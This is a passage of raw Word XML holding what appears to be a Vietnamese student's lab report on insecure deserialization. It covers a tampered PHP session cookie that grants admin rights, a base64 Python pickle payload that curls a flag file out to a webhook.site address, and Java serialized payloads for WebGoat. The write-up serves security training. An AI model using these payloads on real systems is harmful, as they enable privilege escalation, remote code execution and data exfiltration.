    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BT1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Modifying serialized objects</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Khi đăng nhập vào trang web và xem cookies thì chúng em thấy được một phiên làm việc dưới dạng Base64</w:t>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5734050" cy="2476500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2" name="image9.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image9.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:srcRect b="0" l="0" r="0" t="23303"/>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Khi copy giá trị của phiên làm việc đó và decode, chúng ta có được giá trị như sau: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}7</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734050" cy="1970106"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="41" name="image28.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image28.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:srcRect b="19529" l="0" r="0" t="19420"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="197010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Đây là chuỗi output của một hàm serialize, lưu class và các thuộc tính của obj.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ở đây, chúng ta có thể sửa phần username thành admin, và nâng giá trị biến boolean lên thành 1 (Có thể đoán đây là giá trị phân quyền admin và user).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">O:4:"User":2:{s:8:"username";s:5:"admin";s:5:"admin";b:1;}7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi sửa xong, chúng ta encode Base64 và thay phần session trong cookies thành chuỗi encode trên, reload page.</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734050" cy="2533650"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="17" name="image7.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image7.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:srcRect b="13569" l="0" r="0" t="7964"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734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=&gt; Đã vào page của admin và có thêm phần “Admin panel”.</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734050" cy="2438710"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="34" name="image26.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image26.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:srcRect b="16212" l="0" r="0" t="8269"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="243871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Ta click vào “Admin panel” và xóa user carlos =&gt; Done.</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734050" cy="2371725"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="35" name="image25.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image25.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:srcRect b="18289" l="0" r="0" t="8259"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734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b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BT2: </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Khi vào trang web và nhấn vào mua 1 món bất kì, chúng ta sẽ thấy được 1 request hiện lên trong cookies có session ở dạng Base64:</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4050" cy="2851863"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21" name="image19.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image19.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:srcRect b="8129" l="0" r="0" t="3660"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="28518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Ta decode ra một chuỗi như sau:</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34050" cy="2899798"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="40" name="image27.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image27.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:srcRect b="5467" l="0" r="0" t="4849"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="289979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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Đến đây, ta có thể thấy đoạn chuỗi này có format khá giống với một object pickle. Ta dùng python và thư viện pickle để thử decode đoạn chuỗi này và nhận được kết quả: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{'money': 390, 'history': ['Yummy standard pickle', 'Yummy smörgåsgurka'], 'anti_tamper_hmac': 'afc5ecb599a222a7fcbcf543f25368ce'}</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1200" cy="927100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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Sau khi decode, chúng ta thấy được chuỗi này ở format khá quen thuộc, là một obj serialization =&gt; Server đang deserialize cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vậy ta cần phải generate ra 1 payload mà từ đó gửi lên cookie mà làm cho trang gửi flag về một địa chỉ mà ta mong muốn</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731200" cy="3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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ở đây ta sẽ generate 1 link nhận response từ web pickle shop: </w:t>
      </w:r>
      <w:hyperlink r:id="rId42">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://webhook.site/54e3a8b2-3414-47c5-8f03-52dd16add893</w:t>
        </w:r>
      </w:hyperlink>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và bên cạnh đó ta truyền vào -d `cat flag.txt`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">từ đó ta sẽ generate ra 1 payload: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gASVawAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjFBjdXJsIGh0dHBzOi8vd2ViaG9vay5zaXRlLzU0ZTNhOGIyLTM0MTQtNDdjNS04ZjAzLTUyZGQxNmFkZDg5MyAtZCBgY2F0IGZsYWcudHh0YJSFlFKULg==</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau đó ta copy và paste payload này vào pickle shop:</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731200" cy="3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4"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Sau đó ta check bên webhook:</w:t>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731200" cy="3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="33"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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Và flag ta nhận được là: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">W1{19161423_15_411_317311_13377312_311612291971011_1113776010}</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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BT3: </w:t>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Đầu tiên ta sẽ git clone về WebGoat và tải bản release 8.2.2</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4762500" cy="2019300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="39"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762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VulnerableTaskHolder</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> được cung cấp</w:t>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731200" cy="3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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Sau đó tiến hành code để truyền vào taskName và taskAction với tên và hành động là ngủ 5 giây</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731200" cy="3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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Sau khi run ta được payload </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731200" cy="1524000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">payload 1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAECAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfmCgUCCwgSqcF4eHQAB3NsZWVwIDV0ABNzbGVlcCBmb3IgNSBzZWNvbmRz</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Nhưng sau khi kiểm tra đây là payload sai vì:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Khi chúng ta copy code từ trên WebGoat local server và WebGoat trên Github thì có sự khác biệt về:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Thông số serialVersionUID = 2 trên Github và serialVersionUID = 1 trên code local server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Class </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VulnerableTaskHolder</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> copy từ local server sẽ khác với class </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VulnerableTaskHolder</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên GitHub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vậy chúng ta cần phải clone từ GitHub về và code bên trong folder WebGoat được clone từ Github.</w:t>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731200" cy="3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="18"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Có thể thấy được ta bỏ code vào folder WebGoat/scr/main/java và trích đường dẫn đến Class </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VulnerableTaskHolder</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong folder org/dummy/insecure/framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau đó chạy lại chương trình</w:t>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731200" cy="1765300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="42"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Payload đúng:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAICAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfmCgUBOjMPMQ1oeHQAB3NsZWVwIDV0ABNzbGVlcCBmb3IgNSBzZWNvbmRz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Đối sánh 2 payload </w:t>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5731200" cy="419100"/>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Submit kết quả lên local server WebGoat (hoàn thành)</w:t>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731200" cy="3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3"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headerReference r:id="rId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s://webhook.site/54e3a8b2-3414-47c5-8f03-52dd16add893" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.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cebook.com/groups/bht.cnpm.uit/posts/946708845926790/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.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17.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><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12.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.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